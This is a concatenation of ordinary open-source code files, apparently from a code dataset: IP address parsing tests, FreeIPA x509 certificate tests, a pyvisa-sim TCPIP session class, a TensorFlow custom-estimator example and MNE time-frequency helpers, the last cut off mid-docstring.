self._network_list_v4.append((ip, prefix_size))
else:
self._network_list_v6.append((ip, prefix_size))
def __contains__(self, addr):
addr_family = is_ip(addr)
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(addr))
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v4))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, addr))
ip = (hi << 64) | lo
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v6))
else:
return False
def test_inet_conv():
ipv4 = b'8.8.4.4'
b = inet_pton(socket.AF_INET, ipv4)
assert inet_ntop(socket.AF_INET, b) == ipv4
ipv6 = b'2404:6800:4005:805::1011'
b = inet_pton(socket.AF_INET6, ipv6)
assert inet_ntop(socket.AF_INET6, b) == ipv6
def test_parse_header():
assert parse_header(b'\x03\x0ewww.google.com\x00\x50') == \
(3, b'www.google.com', 80, 18)
assert parse_header(b'\x01\x08\x08\x08\x08\x00\x35') == \
(1, b'8.8.8.8', 53, 7)
assert parse_header((b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00'
b'\x00\x10\x11\x00\x50')) == \
(4, b'2404:6800:4005:805::1011', 80, 19)
def test_pack_header():
assert pack_addr(b'8.8.8.8') == b'\x01\x08\x08\x08\x08'
assert pack_addr(b'2404:6800:4005:805::1011') == \
b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00\x00\x10\x11'
assert pack_addr(b'www.google.com') == b'\x03\x0ewww.google.com'
def test_ip_network():
ip_network = IPNetwork('127.0.0.0/24,::ff:1/112,::1,192.168.1.1,192.0.2.0')
assert '127.0.0.1' in ip_network
assert '127.0.1.1' not in ip_network
assert ':ff:ffff' in ip_network
assert '::ffff:1' not in ip_network
assert '::1' in ip_network
assert '::2' not in ip_network
assert '192.168.1.1' in ip_network
assert '192.168.1.2' not in ip_network
assert '192.0.2.1' in ip_network
assert '192.0.3.1' in ip_network # 192.0.2.0 is treated as 192.0.2.0/23
assert 'www.google.com' not in ip_network
if __name__ == '__main__':
test_inet_conv()
test_parse_header()
test_pack_header()
test_ip_network()
| apache-2.0 | 8,077,218,631,892,797,000 | 30.524306 | 79 | 0.544223 | false |
encukou/freeipa | ipatests/test_ipalib/test_x509.py | 2 | 16469 | # Authors:
# Rob Crittenden <[email protected]>
#
# Copyright (C) 2010 Red Hat
# see file 'COPYING' for use and warranty information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test the `ipalib.x509` module.
"""
import base64
from binascii import hexlify
from configparser import RawConfigParser
import datetime
from io import StringIO
import pickle
import pytest
from cryptography import x509 as crypto_x509
from cryptography.x509.general_name import DNSName
from ipalib import x509
from ipapython.dn import DN
pytestmark = pytest.mark.tier0
# certutil -
# certificate for CN=ipa.example.com,O=IPA
goodcert = (
b'MIICAjCCAWugAwIBAgICBEUwDQYJKoZIhvcNAQEFBQAwKTEnMCUGA1UEAxMeSVBB'
b'IFRlc3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MB4XDTEwMDYyNTEzMDA0MloXDTE1'
b'MDYyNTEzMDA0MlowKDEMMAoGA1UEChMDSVBBMRgwFgYDVQQDEw9pcGEuZXhhbXBs'
b'ZS5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJcZ+H6+cQaN/BlzR8OY'
b'kVeJgaU5tCaV9FF1m7Ws/ftPtTJUaSL1ncp6603rjA4tH1aa/B8i8xdC46+ZbY2a'
b'u8b9ryGcOsx2uaRpNLEQ2Fy//q1kQC8oM+iD8Nd6osF0a2wnugsgnJHPuJzhViaW'
b'xYgzk5DRdP81debokF3f3FX/AgMBAAGjOjA4MBEGCWCGSAGG+EIBAQQEAwIGQDAT'
b'BgNVHSUEDDAKBggrBgEFBQcDATAOBgNVHQ8BAf8EBAMCBPAwDQYJKoZIhvcNAQEF'
b'BQADgYEALD6X9V9w381AzzQPcHsjIjiX3B/AF9RCGocKZUDXkdDhsD9NZ3PLPEf1'
b'AMjkraKG963HPB8scyiBbbSuSh6m7TCp0eDgRpo77zNuvd3U4Qpm0Qk+KEjtHQDj'
b'NNG6N4ZnCQPmjFPScElvc/GgW7XMbywJy2euF+3/Uip8cnPgSH4='
)
goodcert_headers = (
b'-----BEGIN CERTIFICATE-----\n' +
goodcert +
b'\n-----END CERTIFICATE-----'
)
# The base64-encoded string 'bad cert'
badcert = (
b'-----BEGIN CERTIFICATE-----\n'
b'YmFkIGNlcnQ=\r\n'
b'-----END CERTIFICATE-----'
)
good_pkcs7 = (
b'-----BEGIN PKCS7-----\n'
b'MIIDvAYJKoZIhvcNAQcCoIIDrTCCA6kCAQExADALBgkqhkiG9w0BBwGgggOPMIID\n'
b'izCCAnOgAwIBAgIBATANBgkqhkiG9w0BAQsFADA2MRQwEgYDVQQKDAtFWEFNUExF\n'
b'LkNPTTEeMBwGA1UEAwwVQ2VydGlmaWNhdGUgQXV0aG9yaXR5MB4XDTE3MDkyMDIw\n'
b'NDI1N1oXDTM3MDkyMDIwNDI1N1owNjEUMBIGA1UECgwLRVhBTVBMRS5DT00xHjAc\n'
b'BgNVBAMMFUNlcnRpZmljYXRlIEF1dGhvcml0eTCCASIwDQYJKoZIhvcNAQEBBQAD\n'
b'ggEPADCCAQoCggEBAMNojX57UCCPTtEn9tQJBS4By5NixwodKm1UqOGsiecDrB0i\n'
b'Pw7D6uGP6g4b6srYtbh+YsRJnfekB2L08q1dX3LVEItq2TS0WKqgZuRZkw7DvnGl\n'
b'eANMwjHmE8k6/E0yI3GGxJLAfDZYw6CDspLkyN9anjQwVCz5N5z5bpeqi5BeVwin\n'
b'O8WVF6FNn3iyL66uwOsTGEzCo3Y5HiwqYgaND73TtdsBHcIqOdRql3CC3IdoXXcW\n'
b'044w4Lm2E95MuY729pPBHREtyzVkYtyuoKJ8KApghIY5oCklBkRDjyFK4tE7iF/h\n'
b's+valeT9vcz2bHMIpvbjqAu/kqE8MjcNEFPjLhcCAwEAAaOBozCBoDAfBgNVHSME\n'
b'GDAWgBTUB04/d1eLhbMtBi4AB65tsAt+2TAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud\n'
b'DwEB/wQEAwIBxjAdBgNVHQ4EFgQU1AdOP3dXi4WzLQYuAAeubbALftkwPQYIKwYB\n'
b'BQUHAQEEMTAvMC0GCCsGAQUFBzABhiFodHRwOi8vaXBhLWNhLmdyZXlvYWsuY29t\n'
b'L2NhL29jc3AwDQYJKoZIhvcNAQELBQADggEBADQFwX1uh8tqLq8SqWZWtH95j33o\n'
b'5Ze2dW7sVppb/wVnNauG0wDQW7uIx+Ynr7GgufXLNBMn1aP/mA2CdHk7NZz2IB1s\n'
b'ZvbIfE8dVxzkA+Hh9d6cdgk4eU5rGf6Fw8ScEJ/48Mmncea3uGkHcOmt+BGLA8a1\n'
b'wtruy+iQylOkbv36CbxKV7IsZDP106Zc+cVeOUQZnCLKmvQkotn6UJd8N1X0R2J3\n'
b'4/qv0rUtcCnyEBNSgpTGCRlYM4kd98Dqc5W7wUpMcsQMFxQMSYY7pFQkdLPfJEx2\n'
b'Mg63SPawxfAgUeukrdsF3wTIKkIBu1TVse+kvRvgmRRrfF2a4ZOv5qORe2uhADEA\n'
b'-----END PKCS7-----'
)
long_oid_cert = b'''
-----BEGIN CERTIFICATE-----
MIIFiTCCBHGgAwIBAgITSAAAAAd1bEC5lsOdnQAAAAAABzANBgkqhkiG9w0BAQsF
ADBLMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEjAQBgoJkiaJk/IsZAEZFgJhZDEe
MBwGA1UEAxMVYWQtV0lOLVBQSzAxNUY5TURRLUNBMB4XDTE3MDUyNTIzNDg0NVoX
DTE5MDUyNTIzNTg0NVowNDESMBAGA1UEChMJSVBBLkxPQ0FMMR4wHAYDVQQDExVD
ZXJ0aWZpY2F0ZSBBdXRob3JpdHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQDyyuty6irlL89hdaSW0UyAGLsOOMgAuJwBAeuRUorR159rsSnUXLcTHIsm
EszKhwxp3NkkawRWx/s0UN1m2+RUwMl6gvlw+G80Mz0S77C77M+2lO8HRmZGm+Wu
zBNcc9SANHuDQ1NISfZgLiscMS0+l0T3g6/Iqtg1kPWrq/tMevfh6tJEIedSBGo4
3xKEMSDkrvaeTuSVrgn/QT0m+WNccZa0c7X35L/hgR22/l5sr057Ef8F9vL8zUH5
TttFBIuiWJo8A8XX9I1zYIFhWjW3OVDZPBUnhGHH6yNyXGxXMRfcrrc74eTw8ivC
080AQuRtgwvDErB/JPDJ5w5t/ielAgMBAAGjggJ7MIICdzA9BgkrBgEEAYI3FQcE
MDAuBiYrBgEEAYI3FQiEoqJGhYq1PoGllQqGi+F4nacAgRODs5gfgozzAAIBZAIB
BTAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNVHQ4EFgQUnSrC
yW3CR0e3ilJdN6kL06P3KHMwHwYDVR0jBBgwFoAUj69xtyUNwp8on+NWO+HlxKyg
X7AwgdgGA1UdHwSB0DCBzTCByqCBx6CBxIaBwWxkYXA6Ly8vQ049YWQtV0lOLVBQ
SzAxNUY5TURRLUNBLENOPVdJTi1QUEswMTVGOU1EUSxDTj1DRFAsQ049UHVibGlj
JTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixE
Qz1hZCxEQz1sb2NhbD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2Jq
ZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcQGCCsGAQUFBwEBBIG3MIG0
MIGxBggrBgEFBQcwAoaBpGxkYXA6Ly8vQ049YWQtV0lOLVBQSzAxNUY5TURRLUNB
LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
Tj1Db25maWd1cmF0aW9uLERDPWFkLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFz
ZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MDMGA1UdIAQsMCow
KAYmKwYBBAGCNxUIhKKiRoWKtT6BpZUKhovheJ2nAIEThrXzUYabpA4wDQYJKoZI
hvcNAQELBQADggEBAIsFS+Qc/ufTrkuHbMmzksOpxq+OIi9rot8zy9/1Vmj6d+iP
kB+vQ1u4/IhdQArJFNhsBzWSY9Pi8ZclovpepFeEZfXPUenyeRCU43HdMXcHXnlP
YZfyLQWOugdo1WxK6S9qQSOSlC7BSGZWvKkiAPAwr4zNbbS+ROA2w0xaYMv0rr5W
A4UAyzZAdqaGRJBRvCZ/uFHM5wMw0LzNCL4CqKW9jfZX0Fc2tdGx8zbTYxIdgr2D
PL25as32r3S/m4uWqoQaK0lxK5Y97eusK2rrmidy32Jctzwl29UWq8kpjRAuD8iR
CSc7sKqOf+fn3+fKITR2/DcSVvb0SGCr5fVVnjQ=
-----END CERTIFICATE-----
'''
ipa_demo_crt = b'''\
-----BEGIN CERTIFICATE-----
MIIGFTCCBP2gAwIBAgISA61CoqWtpZoTEyfLCXliPLYFMA0GCSqGSIb3DQEBCwUA
MEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQD
ExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzAeFw0xODA3MjUwNTM2NTlaFw0x
ODEwMjMwNTM2NTlaMCAxHjAcBgNVBAMTFWlwYS5kZW1vMS5mcmVlaXBhLm9yZzCC
ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKisvYUdarWE0CS9i+RcNf9Q
41Euw36R4Myf/PUCDVUvGsVXQWSCanbtyxa8Ows4cAHrfqhiKAnSg0IhLqCMJVQ8
8F699FHrP9EfPmZkG3RMLYPxKNrSmOVyNpIEQY9qfkDXZPLung6dk/c225Znoltq
bVWLObXA7eP9C/djupg3gUD7vOAMHFmfZ3OKnx1uktL5p707o2/qlkSiEO4Z5ebD
M8X0dTkN8V3LCCOjzCp88itGUWJM8Tjb86WkmYkJxmeZx6REd37rDXjqgYhwgXOB
bSqDkYKRaihwvd5Up/vE1wApBS1k7b1oEW80teDUbzbaaqp7oBWbZD2Ac1yJF7UC
AwEAAaOCAx0wggMZMA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcD
AQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQUUmTMI1CB6qFMXc0+
AGmqpfBAwhIwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7/Oo7KEwbwYIKwYB
BQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2Vu
Y3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2Vu
Y3J5cHQub3JnLzAgBgNVHREEGTAXghVpcGEuZGVtbzEuZnJlZWlwYS5vcmcwgf4G
A1UdIASB9jCB8zAIBgZngQwBAgEwgeYGCysGAQQBgt8TAQEBMIHWMCYGCCsGAQUF
BwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCBqwYIKwYBBQUHAgIwgZ4M
gZtUaGlzIENlcnRpZmljYXRlIG1heSBvbmx5IGJlIHJlbGllZCB1cG9uIGJ5IFJl
bHlpbmcgUGFydGllcyBhbmQgb25seSBpbiBhY2NvcmRhbmNlIHdpdGggdGhlIENl
cnRpZmljYXRlIFBvbGljeSBmb3VuZCBhdCBodHRwczovL2xldHNlbmNyeXB0Lm9y
Zy9yZXBvc2l0b3J5LzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB2AMEWSuCnctLU
OS3ICsEHcNTwxJvemRpIQMH6B1Fk9jNgAAABZNAnsSAAAAQDAEcwRQIgHkd/UkTZ
w8iV1Ox8MPHLrpY33cX6i5FV6w9+7YH3H2kCIQCVcrhsr4fokDyE2ueUqSFxkBVH
WND84/w5rFNAPjyO1QB2ACk8UZZUyDlluqpQ/FgH1Ldvv1h6KXLcpMMM9OVFR/R4
AAABZNAnsyUAAAQDAEcwRQIhALDWY2k55abu7IPwnFvMr4Zqd1DYQXEKWZEQLXUP
s4XGAiAabjpUwrLKVXpbp4WNLkTNlFjrSJafOzLG68H9AnoD4zANBgkqhkiG9w0B
AQsFAAOCAQEAfBNuQn/A2olJHxoBGLfMcQCkkNOfvBpfQeKgni2VVM+r1ZY8YVXx
OtVnV6XQ5M+l+6xlRpP1IwDdmJd/yaQgwbmYf4zl94W/s/qq4nlTd9G4ahmJOhlc
mWeIQMoEtAmQlIOqWto+Knfakz6Xyo+HVCQEyeoBmYFGZcakeAm6tp/6qtpkej+4
wBjShMPAdSYDPRaAqnZ3BAK2UmmlpAA5tkNvqOaHBCi760zYoxT6j1an7FotG0v9
2+W0aL34eMWKz/g4qhwk+Jiz45LLQWhHGIgXIUoNSzHgLIVuVOQI8DPsguvT6GHW
QUs1Hx1wL7mL4U8fKCFDKA+ds2B2xWgoZg==
-----END CERTIFICATE-----
'''
class test_x509:
"""
Test `ipalib.x509`
I created the contents of this certificate with a self-signed CA with:
% certutil -R -s "CN=ipa.example.com,O=IPA" -d . -a -o example.csr
% ./ipa host-add ipa.example.com
% ./ipa cert-request --add --principal=test/ipa.example.com example.csr
"""
def test_1_load_base64_cert(self):
"""
Test loading a base64-encoded certificate.
"""
# Load a good cert
x509.load_pem_x509_certificate(goodcert_headers)
# Load a good cert with headers and leading text
newcert = (
b'leading text\n' + goodcert_headers)
x509.load_pem_x509_certificate(newcert)
# Load a good cert with bad headers
newcert = b'-----BEGIN CERTIFICATE-----' + goodcert_headers
with pytest.raises((TypeError, ValueError)):
x509.load_pem_x509_certificate(newcert)
# Load a bad cert
with pytest.raises(ValueError):
x509.load_pem_x509_certificate(badcert)
def test_1_load_der_cert(self):
"""
Test loading a DER certificate.
"""
der = base64.b64decode(goodcert)
# Load a good cert
x509.load_der_x509_certificate(der)
def test_3_cert_contents(self):
"""
Test the contents of a certificate
"""
# Verify certificate contents. This exercises python-cryptography
# more than anything but confirms our usage of it.
not_before = datetime.datetime(2010, 6, 25, 13, 0, 42)
not_after = datetime.datetime(2015, 6, 25, 13, 0, 42)
cert = x509.load_pem_x509_certificate(goodcert_headers)
assert DN(cert.subject) == DN(('CN', 'ipa.example.com'), ('O', 'IPA'))
assert DN(cert.issuer) == DN(('CN', 'IPA Test Certificate Authority'))
assert cert.serial_number == 1093
assert cert.not_valid_before == not_before
assert cert.not_valid_after == not_after
assert cert.san_general_names == []
assert cert.san_a_label_dns_names == []
assert cert.extended_key_usage == {'1.3.6.1.5.5.7.3.1'}
assert cert.extended_key_usage_bytes == (
b'0\x16\x06\x03U\x1d%\x01\x01\xff\x04\x0c0\n\x06\x08'
b'+\x06\x01\x05\x05\x07\x03\x01'
)
def test_load_pkcs7_pem(self):
certlist = x509.pkcs7_to_certs(good_pkcs7, datatype=x509.PEM)
assert len(certlist) == 1
cert = certlist[0]
assert DN(cert.subject) == DN('CN=Certificate Authority,O=EXAMPLE.COM')
assert cert.serial_number == 1
def test_long_oid(self):
"""
Test cerificate with very long OID. In this case we are using a
certificate from an opened case where one of X509v3 Certificate`s
Policies OID is longer then 80 chars.
"""
cert = x509.load_pem_x509_certificate(long_oid_cert)
ext = cert.extensions.get_extension_for_class(crypto_x509.
CertificatePolicies)
assert len(ext.value) == 1
assert ext.value[0].policy_identifier.dotted_string == (
u'1.3.6.1.4.1.311.21.8.8950086.10656446.2706058.12775672.480128.'
'147.13466065.13029902')
def test_ipa_demo_letsencrypt(self):
cert = x509.load_pem_x509_certificate(ipa_demo_crt)
assert DN(cert.subject) == DN('CN=ipa.demo1.freeipa.org')
assert DN(cert.issuer) == DN(
"CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US")
assert cert.serial_number == 0x03ad42a2a5ada59a131327cb0979623cb605
not_before = datetime.datetime(2018, 7, 25, 5, 36, 59)
not_after = datetime.datetime(2018, 10, 23, 5, 36, 59)
assert cert.not_valid_before == not_before
assert cert.not_valid_after == not_after
assert cert.san_general_names == [DNSName('ipa.demo1.freeipa.org')]
assert cert.san_a_label_dns_names == ['ipa.demo1.freeipa.org']
assert cert.extended_key_usage == {
'1.3.6.1.5.5.7.3.1', '1.3.6.1.5.5.7.3.2'
}
assert cert.extended_key_usage_bytes == (
b'0 \x06\x03U\x1d%\x01\x01\xff\x04\x160\x14\x06\x08+\x06\x01'
b'\x05\x05\x07\x03\x01\x06\x08+\x06\x01\x05\x05\x07\x03\x02'
)
class test_ExternalCAProfile:
def test_MSCSTemplateV1_good(self):
o = x509.MSCSTemplateV1("MySubCA")
assert hexlify(o.get_ext_data()) == b'1e0e004d007900530075006200430041'
def test_MSCSTemplateV1_bad(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV1("MySubCA:1")
def test_MSCSTemplateV1_pickle_roundtrip(self):
o = x509.MSCSTemplateV1("MySubCA")
s = pickle.dumps(o)
assert o.get_ext_data() == pickle.loads(s).get_ext_data()
def test_MSCSTemplateV2_too_few_parts(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4")
def test_MSCSTemplateV2_too_many_parts(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:100:200:300")
def test_MSCSTemplateV2_bad_oid(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("not_an_oid:1")
def test_MSCSTemplateV2_non_numeric_major_version(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:major:200")
def test_MSCSTemplateV2_non_numeric_minor_version(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:100:minor")
def test_MSCSTemplateV2_major_version_lt_zero(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:-1:200")
def test_MSCSTemplateV2_minor_version_lt_zero(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:100:-1")
def test_MSCSTemplateV2_major_version_gt_max(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:4294967296:200")
def test_MSCSTemplateV2_minor_version_gt_max(self):
with pytest.raises(ValueError):
x509.MSCSTemplateV2("1.2.3.4:100:4294967296")
def test_MSCSTemplateV2_good_major(self):
o = x509.MSCSTemplateV2("1.2.3.4:4294967295")
assert hexlify(o.get_ext_data()) == b'300c06032a0304020500ffffffff'
def test_MSCSTemplateV2_good_major_minor(self):
o = x509.MSCSTemplateV2("1.2.3.4:4294967295:0")
assert hexlify(o.get_ext_data()) \
== b'300f06032a0304020500ffffffff020100'
def test_MSCSTemplateV2_pickle_roundtrip(self):
o = x509.MSCSTemplateV2("1.2.3.4:4294967295:0")
s = pickle.dumps(o)
assert o.get_ext_data() == pickle.loads(s).get_ext_data()
def test_ExternalCAProfile_dispatch(self):
"""
Test that constructing ExternalCAProfile actually returns an
instance of the appropriate subclass.
"""
assert isinstance(
x509.ExternalCAProfile("MySubCA"),
x509.MSCSTemplateV1)
assert isinstance(
x509.ExternalCAProfile("1.2.3.4:100"),
x509.MSCSTemplateV2)
def test_write_pkispawn_config_file_MSCSTemplateV1(self):
template = x509.MSCSTemplateV1(u"SubCA")
expected = (
'[CA]\n'
'pki_req_ext_oid = 1.3.6.1.4.1.311.20.2\n'
'pki_req_ext_data = 1e0a00530075006200430041\n\n'
)
self._test_write_pkispawn_config_file(template, expected)
def test_write_pkispawn_config_file_MSCSTemplateV2(self):
template = x509.MSCSTemplateV2(u"1.2.3.4:4294967295")
expected = (
'[CA]\n'
'pki_req_ext_oid = 1.3.6.1.4.1.311.21.7\n'
'pki_req_ext_data = 300c06032a0304020500ffffffff\n\n'
)
self._test_write_pkispawn_config_file(template, expected)
def _test_write_pkispawn_config_file(self, template, expected):
"""
Test that the values we read from an ExternalCAProfile
object can be used to produce a reasonable-looking pkispawn
configuration.
"""
config = RawConfigParser()
config.optionxform = str
config.add_section("CA")
config.set("CA", "pki_req_ext_oid", template.ext_oid)
config.set("CA", "pki_req_ext_data",
hexlify(template.get_ext_data()).decode('ascii'))
out = StringIO()
config.write(out)
assert out.getvalue() == expected
| gpl-3.0 | -8,210,279,496,332,169,000 | 41.776623 | 79 | 0.744247 | false |
famish99/pyvisa-sim | pyvisa_sim/tcpip.py | 1 | 2280 | # -*- coding: utf-8 -*-
"""
pyvisa-sim.tcpip
~~~~~~~~~~~~~~~~
TCPIP simulated session class.
:copyright: 2014 by PyVISA-sim Authors, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
import time
from pyvisa import constants
from . import sessions
class BaseTCPIPSession(sessions.Session):
"""Base class for TCPIP sessions."""
def read(self, count):
end_char, _ = self.get_attribute(constants.VI_ATTR_TERMCHAR)
enabled, _ = self.get_attribute(constants.VI_ATTR_TERMCHAR_EN)
timeout, _ = self.get_attribute(constants.VI_ATTR_TMO_VALUE)
timeout /= 1000
start = time.time()
out = b""
while time.time() - start <= timeout:
last = self.device.read()
if not last:
time.sleep(0.01)
continue
out += last
if enabled:
if len(out) > 0 and out[-1] == end_char:
return out, constants.StatusCode.success_termination_character_read
if len(out) == count:
return out, constants.StatusCode.success_max_count_read
else:
return out, constants.StatusCode.error_timeout
def write(self, data):
send_end = self.get_attribute(constants.VI_ATTR_SEND_END_EN)
for i in range(len(data)):
self.device.write(data[i : i + 1])
if send_end:
# EOM 4882
pass
return len(data), constants.StatusCode.success
@sessions.Session.register(constants.InterfaceType.tcpip, "INSTR")
class TCPIPInstrumentSession(BaseTCPIPSession):
def after_parsing(self):
self.attrs[constants.VI_ATTR_INTF_NUM] = int(self.parsed.board)
self.attrs[constants.VI_ATTR_TCPIP_ADDR] = self.parsed.host_address
self.attrs[constants.VI_ATTR_TCPIP_DEVICE_NAME] = self.parsed.lan_device_name
@sessions.Session.register(constants.InterfaceType.tcpip, "SOCKET")
class TCPIPSocketSession(BaseTCPIPSession):
def after_parsing(self):
self.attrs[constants.VI_ATTR_INTF_NUM] = int(self.parsed.board)
self.attrs[constants.VI_ATTR_TCPIP_ADDR] = self.parsed.host_address
self.attrs[constants.VI_ATTR_TCPIP_PORT] = int(self.parsed.port)
| mit | -8,203,132,260,625,480,000 | 29.4 | 87 | 0.623684 | false |
waynewolf/abucket | from-tf-web/quickstart/1-get-started-tf-contrib-learn-customize.py | 1 | 1494 | import numpy as np
import tensorflow as tf
# Declare list of features, we only have one real-valued feature
def model(features, labels, mode):
# Build a linear model and predict values
W = tf.get_variable("W", [1], dtype=tf.float64)
b = tf.get_variable("b", [1], dtype=tf.float64)
y = W*features['x'] + b
# Loss sub-graph
loss = tf.reduce_sum(tf.square(y - labels))
# Training sub-graph
global_step = tf.train.get_global_step()
optimizer = tf.train.GradientDescentOptimizer(0.01)
train = tf.group(optimizer.minimize(loss),
tf.assign_add(global_step, 1))
# ModelFnOps connects subgraphs we built to the
# appropriate functionality.
return tf.contrib.learn.ModelFnOps(
mode=mode, predictions=y,
loss=loss,
train_op=train)
estimator = tf.contrib.learn.Estimator(model_fn=model)
# define our data sets
x_train = np.array([1., 2., 3., 4.])
y_train = np.array([0., -1., -2., -3.])
x_eval = np.array([2., 5., 8., 1.])
y_eval = np.array([-1.01, -4.1, -7, 0.])
input_fn = tf.contrib.learn.io.numpy_input_fn({"x": x_train}, y_train, 4, num_epochs=1000)
eval_input_fn = tf.contrib.learn.io.numpy_input_fn(
{"x":x_eval}, y_eval, batch_size=4, num_epochs=1000)
# train
estimator.fit(input_fn=input_fn, steps=1000)
# Here we evaluate how well our model did.
train_loss = estimator.evaluate(input_fn=input_fn)
eval_loss = estimator.evaluate(input_fn=eval_input_fn)
print("train loss: %r"% train_loss)
print("eval loss: %r"% eval_loss)
| mit | -8,651,862,507,716,371,000 | 37.307692 | 90 | 0.670683 | false |
MadsJensen/agency_connectivity | tf_functions.py | 1 | 5293 | """
Functions for TF analysis.
@author: mje
@email: mads [] cnru.dk
"""
import mne
from mne.time_frequency import (psd_multitaper, tfr_multitaper, tfr_morlet,
cwt_morlet)
from mne.viz import iter_topography
import matplotlib.pyplot as plt
import numpy as np
def calc_psd_epochs(epochs, plot=False):
"""Calculate PSD for epoch.
Parameters
----------
epochs : list of epochs
plot : bool
To show plot of the psds.
It will be average for each condition that is shown.
Returns
-------
psds_vol : numpy array
The psds for the voluntary condition.
psds_invol : numpy array
The psds for the involuntary condition.
"""
tmin, tmax = -0.5, 0.5
fmin, fmax = 2, 90
# n_fft = 2048 # the FFT size (n_fft). Ideally a power of 2
psds_vol, freqs = psd_multitaper(epochs["voluntary"],
tmin=tmin, tmax=tmax,
fmin=fmin, fmax=fmax)
psds_inv, freqs = psd_multitaper(epochs["involuntary"],
tmin=tmin, tmax=tmax,
fmin=fmin, fmax=fmax)
psds_vol = 20 * np.log10(psds_vol) # scale to dB
psds_inv = 20 * np.log10(psds_inv) # scale to dB
if plot:
def my_callback(ax, ch_idx):
"""Executed once you click on one of the channels in the plot."""
ax.plot(freqs, psds_vol_plot[ch_idx], color='red',
label="voluntary")
ax.plot(freqs, psds_inv_plot[ch_idx], color='blue',
label="involuntary")
ax.set_xlabel = 'Frequency (Hz)'
ax.set_ylabel = 'Power (dB)'
ax.legend()
psds_vol_plot = psds_vol.copy().mean(axis=0)
psds_inv_plot = psds_inv.copy().mean(axis=0)
for ax, idx in iter_topography(epochs.info,
fig_facecolor='k',
axis_facecolor='k',
axis_spinecolor='k',
on_pick=my_callback):
ax.plot(psds_vol_plot[idx], color='red', label="voluntary")
ax.plot(psds_inv_plot[idx], color='blue', label="involuntary")
plt.legend()
plt.gcf().suptitle('Power spectral densities')
plt.show()
return psds_vol, psds_inv, freqs
def multitaper_analysis(epochs):
"""
Parameters
----------
epochs : list of epochs
Returns
-------
result : numpy array
The result of the multitaper analysis.
"""
frequencies = np.arange(6., 90., 2.)
n_cycles = frequencies / 2.
time_bandwidth = 4 # Same time-smoothing as (1), 7 tapers.
power, plv = tfr_multitaper(epochs, freqs=frequencies, n_cycles=n_cycles,
time_bandwidth=time_bandwidth, return_itc=True)
return power, plv
def morlet_analysis(epochs, n_cycles=4):
"""
Parameters
----------
epochs : list of epochs
Returns
-------
result : numpy array
The result of the multitaper analysis.
"""
frequencies = np.arange(6., 30., 2.)
# n_cycles = frequencies / 2.
power, plv = tfr_morlet(epochs, freqs=frequencies, n_cycles=n_cycles,
return_itc=True,
verbose=True)
return power, plv
def single_trial_tf(epochs, frequencies, n_cycles=4.):
"""
Parameters
----------
epochs : Epochs object
The epochs to calculate TF analysis on.
frequencies : numpy array
n_cycles : int
The number of cycles for the Morlet wavelets.
Returns
-------
results : numpy array
"""
results = []
for j in range(len(epochs)):
tfr = cwt_morlet(epochs.get_data()[j],
sfreq=epochs.info["sfreq"],
freqs=frequencies,
use_fft=True,
n_cycles=n_cycles,
# decim=2,
zero_mean=False)
results.append(tfr)
return results
def calc_spatial_resolution(freqs, n_cycles):
"""Calculate the spatial resolution for a Morlet wavelet.
The formula is: (freqs * cycles)*2.
Parameters
----------
freqs : numpy array
The frequencies to be calculated.
n_cycles : int or numpy array
The number of cycles used. Can be integer for the same cycle for all
frequencies, or a numpy array for individual cycles per frequency.
Returns
-------
